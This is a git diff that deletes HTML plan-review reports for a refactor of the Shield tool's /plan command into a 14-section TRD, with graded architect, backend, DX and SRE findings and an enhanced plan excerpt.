AC7Acceptance criteria testabilityAEvery AC is testable. Examples: "exit code 0" (EPIC-3-S1), "reports that section by slug as a Critical finding" (EPIC-4-S1), "40-char hex sha" (EPIC-5-S1). No vagueness.
AC8Sprint-readinessAEach story declares "status": "ready". File paths, schemas, thresholds, and named errors are all pre-decided. A developer could pick up any story without a planning meeting.
AC9Estimation feasibilityA-Detail is sufficient for confident estimation. EPIC-3-S2 (14 missing-section fixtures + drift + vague-TBD) is the largest unit of work and could be split for tighter sizing.
AC10Definition of Done alignmentB+DoD is implied: code change + eval fixture + RED→GREEN paper trail (CLAUDE.md mandate). No explicit mention of code review, deploy-to-staging, or user-facing CHANGELOG.
AC13Milestone coverageAEvery milestone has covering stories: M1 = 8, M2 = 3, M3 = 2. No milestone is empty.
AC14Milestone reference integrityAEvery story's milestone_id is M1, M2, or M3 — all match sidecar.milestones[].id. No dangling references.
AC15Milestone exit criteria testabilityAAll exit criteria are testable.
AC16Milestone DAG integrityADAG is M1 → M2 → M3. Linear chain, no cycles.
-

Key Finding: Sprint-ready plan — every story has crisp file targets, exact thresholds, named errors, and testable ACs; the milestone DAG and reference integrity are clean; the only meaningful gap is that the largest story (EPIC-3-S2) could be split for finer estimation, and DoD's code-review/changelog rituals are implicit.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P2AC9Split EPIC-3-S2 into two stories: (a) "Build negative-fixture generator + 14 missing-section fixtures" and (b) "Author drift-by-addition + vague-TBD fixtures."
P2AC6In EPIC-4-S3, name the adapter file per tool instead of "Update the relevant adapter logic."
P2AC10Add one cross-cutting AC requiring a CHANGELOG entry / migration note documenting the cutover.
P2AC2Make intra-milestone story ordering explicit (e.g., EPIC-1-S2 depends on EPIC-1-S1 slug list; EPIC-3-S2 depends on EPIC-3-S1 positive fixture).
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html deleted file mode 100644 index 3d281ad2..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html +++ /dev/null @@ -1,149 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

Architect — Detailed Findings

-
-

Back to summary

-
-

Architect Review (Grade: B)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
CA1Artifact/component topologyAThe artifact graph is well-formed: research.mdtrd.md (14 sections w/ stable kebab anchors) → plan.json (stories with design_refs[] pointing at TRD anchors) → /pm-sync adapters → PM tools. Anchor scheme ({#section-id}) is explicitly defined as the join key. EPIC-1-S1 publishes the slug allow-list as a machine-readable sidecar under shield/schema/ so eval/review/generator all import from the same source — single source of truth.
CA2Schema/template growthBSchema evolution path is explicit: 1.1 → 1.2 (design_refs[]) → 1.3 (last_aligned_with), each additive. Gap: the plan does not specify what happens when the 14-section list itself needs to evolve. A template_version field on TRD frontmatter would close this.
CA3Backward compatibilityABackward compatibility is rigorously asserted across every schema change. Adapters without link affordance log and continue gracefully. Old plan-architecture.md files explicitly preserved.
CA4Cross-tool / cross-domain reachBMulti-tool reach well covered. Multi-domain reach is headline (one TRD, two domains). Gap: "Mixed → annotate per section" is a single sentence with no worked example or fixture. A monorepo with both *.tf and pyproject.toml is realistic and the plan punts. No mixed-domain positive fixture in EPIC-3-S1.
CA5Contract/interface design across componentsAContract surfaces are tight: design_refs[] shape fully defined; section anchors use explicit {#section-id} kebab-case; slug allow-list machine-readable; LLD placeholder shape precisely specified. Forward-looking contract that lets /lld resolve TODOs later without schema change.
CA6Blast radius / failure-mode isolationBSeveral failure modes explicitly handled and isolated (re-run safety, PM-sync degraded mode, eval gates cutover, undead-doc drift countered). Gaps: (a) stale design_refs[].anchor_url when section renamed/deleted between runs — /plan-review has no detection; (b) last_aligned_with race when working tree is dirty; (c) eval fixture set falling out of sync with live slug allow-list.
CA7Mechanism choice for each concernBMostly well-reasoned (markdown anchors, eval-as-enforcement, additive schema growth, substring-overlap for duplication detection). Concerns: (a) EPIC-4-S2 "> 80 characters" magic number undefended; (b) EPIC-5-S2 ">20 lines" same; (c) last_aligned_with records commit SHA but doesn't capture whether the TRD itself has changed since that SHA — a trd_sha content hash would catch post-commit edits.
CA8Positive ↔ negative fixture parity & template ↔ eval ↔ review consistencyBParity mostly enforced. 14 missing-section negatives derived from positive by removing one — right pattern. Slug allow-list imported by generator + eval + review. Gaps: (a) no round-trip integration eval (/plan output → /plan-review says no Criticals); (b) no positive fixture for mixed-domain or LLD-TODO placeholder shape; (c) EPIC-3-S3 AC says "13 negatives" — actual count is 14 missing-section + 1 drift + 1 vague-TBD = 16. Off-by-N inconsistency between AC text and fixture inventory in EPIC-3-S2.
-

Key Finding: The plan has unusually rigorous artifact-topology design but leaks credibility through small inconsistencies — plan-architecture.md still says "13-section" at lines 25, 37, 75; EPIC-3-S3 says "13 negatives" when EPIC-3-S2 enumerates 16; the mixed-domain path is asserted ("Mixed → annotate per section") without a worked example or fixture. Headline architectural choices are sound; gaps are in edge-case completeness.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1CA8Fix the negative-fixture count inconsistency. plan.md EPIC-3-S3 AC says "all 13 negatives fail" but EPIC-3-S2 enumerates 16. Pick a number and propagate.
P1CA8Fix the stale "13-section" references in plan-architecture.md (lines 25, 37, 75). Reconcile to 14 everywhere.
P1CA4Add a worked example and at least one eval fixture for the mixed-domain case: (a) positive-mixed/ fixture, (b) explicit guidance in plan-docs/SKILL.md, (c) detection rule for mixed (both infra and backend markers).
P1CA6Specify stale-anchor detection. Add an AC to EPIC-4-S1: "/plan-review reports any design_refs[].anchor_url whose #section-id is not present in the linked trd.md as a Critical finding."
P2CA7Defend or parameterize the magic numbers (>80 char overlap, >20 line code block).
P2CA7Consider adding trd_sha (content hash) alongside last_aligned_with (commit SHA) in EPIC-5-S1.
P2CA2Add a TRD template_version field so legitimate template evolution doesn't trigger the drift-by-addition negative.
P2CA8Add a round-trip integration eval: /plan output → /plan-review asserts no Critical findings.
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html deleted file mode 100644 index d4142e75..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html +++ /dev/null @@ -1,165 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

Backend Engineer — Detailed Findings

-
-

Back to summary

-
-

Backend Engineer Review (Grade: C+)

-

Scope: Python-touching stories in Shield's own codebase. Primary target: EPIC-4-S3 (adapter changes). Secondary: EPIC-2-S1 / EPIC-5-S1 (schema bumps), EPIC-3-S1/S2/S3 (eval wiring). -Stack detected: Python (uv-managed). pyproject.toml at shield/adapters/clickup/, plus shield/adapters/sast/*/pyproject.toml. No framework-specific Python skills yet — agnostic review applies.

-

Score Summary

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Evaluation PointGradeRationale
API design / adapter interface stability (EPIC-4-S3)CSchema shape locked, but adapter contract (signature, return type, error model, per-tool retry/idempotency) unspecified
Schema versioning discipline (EPIC-2-S1, EPIC-5-S1)BBumps to 1.2/1.3 with explicit back-compat statements; no formal $id/$schema, no validator, no rejection of unknown future versions
Testing strategy (EPIC-3 + EPIC-4-S3 fixtures)B-Strong fixture topology for TRD format; per-adapter fixtures only sketched — HTTP-mocking strategy, fault-injection, and idempotency replay absent
Framework patterns / uv-based deps (adapter package layout)DPlan adds adapter logic in shield/adapters/ for Confluence/Jira/Notion but only clickup is a packaged uv module today; no story scaffolds new packages, deps, or test harness
Error & observability (adapter failure modes)D+One log-line described; no structured logging, no partial-failure semantics, no metric/event surface
Concurrency & idempotency (sync re-runs, design_refs upserts)DEPIC-2-S2 mentions "preserved or updated in place"; nothing about idempotent remote-link upsert (Jira/Confluence remote-links can dupe on re-run without externalId)
Deployment safety / blast radius (direct cutover)CDirect cutover acknowledged; rollback path documented; but no kill switch, no canary, and EPIC-1-S2 mutates output-paths.yaml keys (consumer-facing contract)
-

Composite: C+ — the plan's what is well-shaped; the how leaks responsibility to implementation time for the parts that historically cause incidents (adapter idempotency, partial failures, schema validator wiring).

-

Detailed Evaluation

-

1. API design / adapter interface stability — C

-

What the plan says:

-
    -
  • EPIC-4-S3 task: "Update the relevant adapter logic (Python under shield/adapters/) for each tool: Confluence remote link, Jira remote-issue-link, ClickUp URL custom field, Notion URL property."
  • -
  • EPIC-4-S3 task: "Adapters that do not understand design_refs[] (or have no link affordance) log 'design_refs forwarding skipped — adapter does not support web links' instead of failing."
  • -
-

Gaps:

-
    -
  • No adapter interface contract. No Python function/method signature for design_refs[] forwarding. Without a typed contract, four adapters will drift in shape.
  • -
  • No return-type discipline. pm-sync already has a pm_sync MCP tool surface (shield/adapters/clickup/server/tools/sync.py:115). The plan doesn't say how the new forwarding result threads back into the existing sync_auto_link action_log path.
  • -
  • The four adapters are heterogeneous on link semantics — Jira remote-issue-link, Confluence remote-link, ClickUp URL custom-field, Notion URL property. The plan treats them as a single bullet.
  • -
  • No idempotency key. Jira/Confluence remote-links accept a globalId precisely so reruns don't duplicate.
  • -
-

2. Schema versioning discipline — B

-

Strengths: Two version bumps with explicit back-compat statements. DesignRef shape published. last_aligned_with: string | null precisely typed.

-

Gaps:

-
    -
  • No machine-readable JSON Schema. The sidecar schema lives as prose+jsonc. No validator, no story to add one. This is the inflection point where prose-only schemas drift.
  • -
  • No forward-compat policy. What does /plan-review do when it encounters version: "1.4" from a future Shield?
  • -
  • doc ∈ {trd, lld, prd} is an enum but the plan does not say whether it's enforced. Unknown doc should fail validation.
  • -
  • design_refs[] cardinality. EPIC-2-S2 says "at least one TRD design_ref per story" — should be lifted into sidecar-schema.md as a "minimum 1" constraint.
  • -
-

3. Testing strategy — B-

-

Strengths: TRD-format eval matrix genuinely well-designed. 14 missing-section + drift + vague-TBD is right shape and matches CLAUDE.md eval-coverage mandate. "Named, distinguishable error" requirement (EPIC-3-S2 AC) is a sharp testability bar.

-

Gaps:

-
    -
  • Adapter fixtures are one bullet for four heterogeneous REST APIs. No mention of responses/vcrpy/in-memory fake. shield/adapters/clickup/tests/test_contract.py already exists — plan should explicitly extend that pattern.
  • -
  • No re-run / idempotency test. EPIC-2-S2 AC says "Re-running /plan does not duplicate entries." Where is the fixture proving this? Same for EPIC-4-S3.
  • -
  • No failure-injection fixture for partial-success. Confluence accepts, Jira 5xxs — does /pm-sync exit non-zero? Continue?
  • -
  • EPIC-3-S2 AC undercounts negatives. "14 missing-section" + drift + vague-TBD = 16 total. EPIC-3-S3 says "all 13 negatives fail" — 14 vs 13 inconsistency.
  • -
-

4. Framework patterns / uv-based deps — D

-

This is the weakest point.

-
    -
  • Only one adapter exists today as a uv package. Repo has shield/adapters/clickup/pyproject.toml and that's it. There is no shield/adapters/jira/, confluence/, or notion/. EPIC-4-S3 implies four-tool work but contains zero scaffolding tasks.
  • -
  • CLAUDE.md mandates uv-only Python. Each new adapter needs its own pyproject.toml declaring deps like atlassian-python-api or requests, plus a dev-dep for the test harness. Plan does not name any HTTP-client library.
  • -
  • No shared utility module. Four adapters will need the same DesignRef dataclass, the same "skip if no link affordance" decision, and the same logging shape. No shield/adapters/_common/ story.
  • -
-

5. Error & observability — D+

-
    -
  • One log line ≠ observability. No log level, no structured fields, no counter/event emission, no partial-failure surface.
  • -
  • No error taxonomy. What happens on malformed anchor_url? Adapter 401/403 vs 4xx vs 5xx? Rate-limited?
  • -
  • No retry policy. ClickUp adapter today almost certainly has retry/backoff. Plan doesn't say new adapters inherit it.
  • -
  • action_log integration. Existing clickup adapter writes structured records (action="sync_auto_link" at sync.py:319). EPIC-4-S3 should require a new action type forward_design_ref for traceability.
  • -
-

6. Concurrency & idempotency — D

-
    -
  • Upsert semantics undefined. Jira's remote-issue-link API uses globalId for upsert; without one, every /pm-sync re-run posts a duplicate. Obvious idempotency key: globalId = sha256(story_id + anchor_url).
  • -
  • Confluence content-property vs inline-link distinction — Confluence has multiple "remote link"-shaped affordances and plan does not pick one.
  • -
  • No concurrent-sync story. Two engineers running /pm-sync on the same plan — locking or last-write-wins?
  • -
  • EPIC-5-S1 last_aligned_with race: what if /implement flips two stories to done from concurrent sessions?
  • -
-

7. Deployment safety / blast radius — C

-

Strengths: Rollback path explicit. design_refs[] and last_aligned_with are additive. Pre-refactor folders stay readable.

-

Gaps:

-
    -
  • shield/schema/output-paths.yaml is a consumer-facing contract. EPIC-1-S2 says "replace plan_arch_md with plan_trd_md." Header reads "Plugin-owned contract. Consumers should NOT edit." Consumers may depend on the key name. Plan should add plan_trd_md while keeping plan_arch_md deprecated.
  • -
  • No kill switch. "Direct cutover" with eval-shaped safety is reasonable for internal tool — but worth one sentence acknowledging only remedy is revert-the-PR.
  • -
  • Cross-PR coupling. EPIC-2-S1 (schema 1.2) in M1; EPIC-5-S1 (schema 1.3) in M3. If M2 ships and M3 stalls, sidecars stay at 1.2 with no last_aligned_with — fine because optional, but plan should affirm.
  • -
-

Recommendations

-

P0 (block merge of plan into implementation)

-

P0-1. Specify the adapter interface for design_refs[] forwarding (EPIC-4-S3). Lock the function signature and idempotency key across all four adapters: forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult with ForwardResult{created, skipped, errors}. Each ref produces sha256(story_id + anchor_url)[:32] used as globalId.

-

P0-2. Add an idempotency test fixture: "Running /pm-sync twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes."

-

P0-3. Add an adapter-scaffolding story or split EPIC-4-S3 by adapter. Only ClickUp exists as a uv package today. Either split into EPIC-4-S3a/b/c/d each with own scaffold, or add EPIC-4-S0: "Scaffold shield/adapters/{jira,confluence,notion}/ uv packages with pyproject.toml, MCP-server skeleton, tests/, and shared shield/adapters/_common/design_refs.py."

-

P0-4. Resolve the 14 vs 13 inconsistency across all artifacts.

-

P1 (fix before implementation milestone closes)

-

P1-1. Add a schema-validation story: shield/scripts/validate_plan.py using pydantic or jsonschema, invoked by /plan-review and the eval runner.

-

P1-2. Document forward-compat policy in sidecar-schema.md.

-

P1-3. Specify the HTTP test harness: "Adapter eval fixtures use responses (or respx) to mock the remote APIs. No live HTTP. Tests tagged @pytest.mark.adapter_contract so they can run in CI without secrets."

-

P1-4. Specify observability shape: one action_log entry per ref forwarded with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit forward_design_ref_failed.

-

P1-5. Add deprecation overlap for output-paths.yaml: keep plan_arch_md / plan_arch_html keys marked deprecated: true.

-

P2 (polish, not blocking)

-
    -
  • Concurrent-sync acknowledgement in plan-architecture.md
  • -
  • Rate-limit handling note per existing adapter posture
  • -
  • Decide fate of this plan's own plan-architecture.md post-M1
  • -
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html deleted file mode 100644 index 2b699559..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html +++ /dev/null @@ -1,216 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

DX Engineer — Detailed Findings

-
-

Back to summary

-
-

DX Engineer Review (Grade: B+)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
DX1Plan clarityA"Why this refactor" paragraph and milestone table give 30-second comprehension — "unified 14-section TRD replacing free-form plan-architecture.md, covers backend + infra, direct cutover."
DX2Story actionabilityBMost stories name exact files and concrete deltas. Gaps: EPIC-2-S2 names a "heuristic for picking section_id" but never defines what keyword-matching algorithm to use; EPIC-4-S3 says "the relevant adapter logic (Python under shield/adapters/)" without naming any of the 4 adapter files.
DX3Implementation step detailBStrong specifics in many places (slug allow-list verbatim, domain-detection markers enumerated, thresholds quantified). Weak spots: EPIC-3-S2 doesn't show the YAML schema; EPIC-3-S3 says uv run shield/evals/run.py plan-trd "or equivalent existing eval runner" — author should commit to one.
DX4Ambiguity auditBSeveral soft phrases survived: EPIC-4-S2 "e.g., flag if > 80 characters" (advisory not normative); EPIC-5-S2 "more than N lines" and only later pins N=20; EPIC-1-S2 "Mixed → annotate per section" is undefined; EPIC-2-S2 says entries are "preserved or updated in place" — which is it?
DX5Context sufficiencyAPlan links to research.md, plan-architecture.md, and PR #43 sample. A new joiner can chase the references without tribal knowledge.
DX6Dependency clarityAMilestone-level depends_on is explicit. M1 ships as a single PR is called out. Eval-before-generator constraint is documented. Minor gap: story-level depends_on is implicit only.
DX7Tool & access requirementsCuv implied by CLAUDE.md but never restated. EPIC-4-S3 needs Confluence/Jira/ClickUp/Notion credentials with no mention of test accounts, sandbox tenants, or how to mock. No mention of which Python version or new deps the eval runner might need.
DX8Handoff readinessBA developer can start EPIC-1-S1, EPIC-3-S1, EPIC-3-S2 cold. EPIC-4-S3 and EPIC-2-S2 would generate questions. Plan assumes familiarity with plan-docs/SKILL.md "generation prompt" current shape.
DX9Service boundariesBBoundaries are clean: shield/commands/plan.md, shield/skills/general/plan-docs/, shield/schema/output-paths.yaml, shield/adapters/<tool>/, shield/evals/. Gap: slug allow-list location is given as "YAML or JSON sidecar under shield/schema/" with choice left open.
DX10API & data flow designBdesign_refs[] contract is explicit. Schema bump path documented (1.1 → 1.2 → 1.3). Gap: no inline example design_refs[] JSON instance; EPIC-2-S2's "preserved or updated in place" merge semantics absent.
DX11Deployment strategyB"Direct cutover, no feature flag" is explicit. "M1 ships as a single PR" specifies atomicity. Old plan-architecture.md files preserved. Rollback strategy documented. Gap: no version bump checklist for .claude-plugin/marketplace.json and pyproject.toml per CLAUDE.md.
DX12CI/CD integrationCEPIC-3-S3 names "Wire eval into CI" but tasks only describe manual PR-body capture. No GitHub Action, no workflow file path, no auto-discovery of new evals. Story title says CI but tasks describe manual capture.
DX13Error handling patternsBSeveral failure modes addressed (adapters without link affordance log + continue, n/a — <reason> escape, missing-reason flagged distinct from vague-TBD). Gap: malformed trd.md recovery? Unknown doc value in design_refs[]? Retry/idempotency for /pm-sync partial failures?
DX14Configuration managementCEPIC-1-S2 description says ".shield.json + repo markers" but plan.md drops the .shield.json mention. No mention of secrets management for 4 adapter credentials. Slug allow-list filename left to implementer.
DX15Developer onboardingBplan-architecture.md is fine onboarding. research.md named authoritative. CLAUDE.md covers conventions. Gap: no local-dev "how do I run /plan and see trd.md emit?" walkthrough; no debugging note for non-deterministic eval failures.
-

Key Finding: The plan is one of the more actionable specs reviewed — concrete file paths, verbatim slug allow-list, specific thresholds, clear cutover stance — but four soft spots will generate Slack pings during execution: (1) design_refs[] section_id heuristic underspecified, (2) EPIC-4-S3 doesn't list 4 adapter file paths, (3) "CI" in EPIC-3-S3 is actually PR-body capture, (4) Mixed-domain "annotate per section" output format undefined.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1DX2In EPIC-4-S3, replace "the relevant adapter logic (Python under shield/adapters/)" with the four explicit file paths and the function/class to extend in each.
P1DX4In EPIC-2-S2 tasks, define the section_id selection heuristic concretely: name the exact keyword-matching algorithm.
P1DX4In EPIC-2-S2 AC #3, replace "existing entries are preserved or updated in place" with a precise merge rule.
P1DX12In EPIC-3-S3, decide whether eval runs in GitHub Actions or only in PR-body capture. If CI is in scope, add a workflow YAML task; if not, retitle.
P1DX4In EPIC-1-S2, define what "Mixed → annotate per section" emits in the TRD prose.
P1DX7Add a "Tool & access requirements" subsection covering test tenants, credential location, Python deps.
P1DX14In EPIC-1-S2, decide and document: does domain detection consult .shield.json or only repo markers? The two documents disagree.
P2DX3In EPIC-3-S2/S3, lock the eval runner invocation.
P2DX9In EPIC-1-S1, choose YAML or JSON for the slug allow-list sidecar and commit to a filename.
P2DX10Add an inline example design_refs[] JSON instance to EPIC-2-S1 description.
P2DX11Add a task to EPIC-1-S2 (or a separate release story) for version bumps in .claude-plugin/marketplace.json and pyproject.toml.
P2DX13Add an AC or task covering /pm-sync partial-failure behavior when 1 of 4 adapters errors.
P2DX15Add a "local development" note describing how to run /plan against a fixture repo.
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html deleted file mode 100644 index 027d83ec..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html +++ /dev/null @@ -1,148 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

SRE — Detailed Findings

-
-

Back to summary

-
-

Operations Review — Plan (Grade: C)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
OP1Observability planCEval fixtures (EPIC-3) are the primary observability surface — they tell us when the TRD format drifts. last_aligned_with (EPIC-5-S1) is mentioned as undead-doc telemetry. But no plan for: emitting structured logs from /plan runs, capturing failure telemetry from real-user /plan invocations, or reporting on TRD generation quality in production. The eval is offline only.
OP2Monitoring & alertingFThe plan says nothing about alerting on /plan failure or how regression in CI is surfaced. EPIC-3-S3 captures a PR-time RED→GREEN paper trail but doesn't wire the eval into ongoing CI — only into the implementation PR description. No mention of who is notified if the eval fails post-merge on a future change. No escalation path defined.
OP3Failure mode analysisCSome failure modes addressed (format drift via eval, undead-doc via last_aligned_with, re-run safety via EPIC-1-S3 guard). But several first-order failure modes from the refactor itself are not covered: (a) what happens when /plan runs but emits a malformed trd.md after M1 lands; (b) mixed-domain repos where domain detection misfires; (c) what happens if /plan-review (M2) ships against TRDs that pre-date M1's slug allow-list; (d) the eval cannot validate semantic correctness — only structure.
OP4Backup & recoveryBStrong implicit answer: git history is explicitly called the archive. Existing plan-architecture.md files are preserved. RPO for the tool is effectively zero (everything is source-controlled markdown). RTO for a bad emit is "git revert + re-run /plan". Minor gap: no corruption-recovery for a half-written trd.md.
OP5Capacity planningBNot a scale-sensitive system. The plan implicitly handles growth by being additive. No explicit consideration of number of design_refs[] per story or whether the 14-section template scales to large/small features without padding. Acceptable for meta-tooling context.
OP6Change managementC§Rollback Strategy is concrete. M1 is correctly identified as atomic-PR. However: (a) no canary or staged rollout — direct cutover is the choice but blast radius is every future /plan run; (b) no rollback trigger defined; (c) the version-bump discipline from CLAUDE.md is not in any story's task list.
OP7On-call readinessDInternal tooling — no formal on-call. Proxy concerns: (a) what error message a user sees if trd.md generation fails mid-stream; (b) any troubleshooting runbook when /plan-review flags a TRD the user believes is correct; (c) where users report bugs against the new TRD format; (d) what version of the plugin a trd.md was generated by — no provenance stamp on emitted TRDs. The last_aligned_with field helps for drift but not for incident triage.
-

Key Finding: The refactor has a solid format-correctness safety net (eval fixtures, RED→GREEN paper trail, atomic M1 PR) but lacks a runtime safety net — no continuous CI eval gate, no rollback trigger, no provenance stamping on generated trd.md files, and no failure-mode coverage for mixed-domain repos or interrupted /plan runs.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P0OP2Add a story to EPIC-3 wiring shield/evals/plan-trd.yaml into a recurring CI job (e.g., .github/workflows/), not just the implementation PR body. Without this, a future plan-docs/SKILL.md edit can silently break the 14-section contract.
P0OP3Add an EPIC-1-S2 task: define the failure mode when /plan cannot determine domain (mixed *.tf + package.json). "Mixed → annotate per section" has no AC and no eval fixture.
P1OP6Add an explicit rollback-trigger statement to plan-architecture.md §Rollback: "Revert M1 if any of: (a) eval fails on positive fixtures after merge, (b) >N user-reported broken /plan runs within 48 hours, (c) downstream /pm-sync adapter errors trace back to schema 1.2."
P1OP6Add a task to bump marketplace version in .claude-plugin/marketplace.json and pyproject.toml per CLAUDE.md "When updating any plugin, bump its version in both…in the same commit".
P1OP7Add an AC under EPIC-1-S2 to emit a provenance comment (e.g., <!-- generated by /plan vX.Y.Z on YYYY-MM-DD -->) at the top of trd.md.
P1OP3Add a failure-mode AC: "If /plan cannot write trd.md (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed."
P2OP1Consider a lightweight --dry-run or --validate-only mode for /plan so users can verify a TRD passes the eval locally before committing.
P2OP7Add a one-page troubleshooting block to shield/commands/plan.md listing the top 3 failure modes and recovery steps.
P2OP3Add an eval fixture for the M2 backward-compat scenario: /plan-review running against a pre-M1 plan-architecture.md-only folder.
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html deleted file mode 100644 index 164d8179..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/enhanced-plan.html +++ /dev/null @@ -1,396 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

Plan (Enhanced) — /plan TRD refactor

-

Feature: plan-trd-refactor-20260524 · Phase: v1 cutover · Source: ../../../research.md · ../../../plan-architecture.md -Sidecar: ../../../plan.json (schema v1.1) -Review applied: summary.md (composite B; 6 P0 + 15 P1 + 18 P2 recommendations)

-

What changed vs original plan.md

-

Six P0 fixes and the most consequential P1s have been folded in. Specifically:

-
    -
  • P0-1 fixed: "13" purged from all artifacts; EPIC-3-S3 AC now correctly references 16 negatives (14 missing-section + 1 drift + 1 vague-TBD)
  • -
  • P0-2 fixed: new EPIC-4-S0 added — adapter package scaffolding (Jira/Confluence/Notion don't exist as uv packages today; only ClickUp does). EPIC-4-S3 now consumes that scaffolding rather than implying it
  • -
  • P0-3 fixed: EPIC-4-S3 now specifies the forward_design_refs(task_id, refs) → ForwardResult contract and the globalId = sha256(story_id + anchor_url)[:32] idempotency key
  • -
  • P0-4 fixed: new AC in EPIC-4-S3 — "Running /pm-sync twice in succession produces the same remote state"
  • -
  • P0-5 fixed: EPIC-3-S3 renamed to "Wire eval into recurring CI + RED→GREEN paper trail" with an explicit .github/workflows/ task
  • -
  • P0-6 fixed: EPIC-1-S2 now defines "Mixed → annotate per section" with a worked example; EPIC-3-S1 adds positive-mixed/ fixture
  • -
-

P1s addressed inline:

-
    -
  • EPIC-2-S2 section_id heuristic (P1-1) and merge semantics (P1-2) now concretely specified
  • -
  • EPIC-4-S3 adapter file paths (P1-3) enumerated
  • -
  • EPIC-1-S2 reconciled — domain detection consults repo markers only; .shield.json plan.template_override is the override key (P1-5)
  • -
  • EPIC-4-S1 gets a stale-anchor detection rule (P1-6)
  • -
  • New EPIC-2-S3: JSON Schema validator (P1-7)
  • -
  • EPIC-4-S3 observability shape spelled out — action='forward_design_ref' with structured fields (P1-8)
  • -
  • EPIC-1-S2 keeps plan_arch_md/plan_arch_html keys marked deprecated: true (P1-9)
  • -
  • EPIC-1-S2 gets a provenance-stamp AC (P1-10)
  • -
  • New EPIC-1-S4: version bumps in marketplace.json + pyproject.toml (P1-12)
  • -
  • EPIC-4-S3 gets a tool-and-access requirements subsection naming test tenants + credential storage (P1-13)
  • -
  • EPIC-1-S2 gets an atomic-write AC (P1-14)
  • -
  • sidecar-schema.md gets a forward-compat policy paragraph (P1-15)
  • -
-

P2s deferred to a follow-up review pass: rollback-trigger language in plan-architecture.md (P1-11 — needs prose addition not a story change), trd_sha content hash, template_version field, round-trip integration eval, --dry-run mode, troubleshooting page, magic-number defenses. See summary.md §P2 for the full list.

-
-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameOutcomeDepends on
M1TRD cutover/plan emits trd.md (14 sections, stable anchors, domain-aware prompting for backend/infra, atomic write, provenance stamp); plan.json carries optional design_refs[]; schema validator wired; eval coverage for both domains plus mixed; recurring CI gate in place.
M2Review + sync wiring/plan-review grades against 14-section rubric (with n/a — <reason> escape) + duplication rule + stale-anchor rule; /pm-sync adapters forward design_refs[] as web links with idempotent upsert.M1
M3Drift + duplication hardeninglast_aligned_with metadata + implementation-manual lint rule.M2
-
-

EPIC-1 · TRD generation and storage · M1

-

EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting · priority: high

-

(unchanged from plan.md — see plan.md EPIC-1-S1)

-

EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra) · priority: high

-

Modify shield/commands/plan.md and shield/skills/general/plan-docs/SKILL.md so /plan writes trd.md with all 14 sections for both backend and infrastructure features. Stop emitting plan-architecture.md. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain from repo markers (with .shield.json plan.template_override as the manual override key) and surfaces the right per-section authoring guidance.

-

Tasks

-
    -
  • Replace 'Generate plan-architecture.md' with 'Generate trd.md per the unified 14-section template'.
  • -
  • Update plan-docs/SKILL.md generation prompt to walk 14 sections, select domain-appropriate authoring guidance, emit explicit {#section-id} anchors.
  • -
  • Domain detection (P1-5): reuse existing repo-marker detection (*.tf / atmos.yaml / Chart.yaml → infra; pom.xml / pyproject.toml / package.json / go.mod → backend). For manual override, read .shield.json plan.template_override{infra, backend, mixed}. Document this in shield/commands/plan.md.
  • -
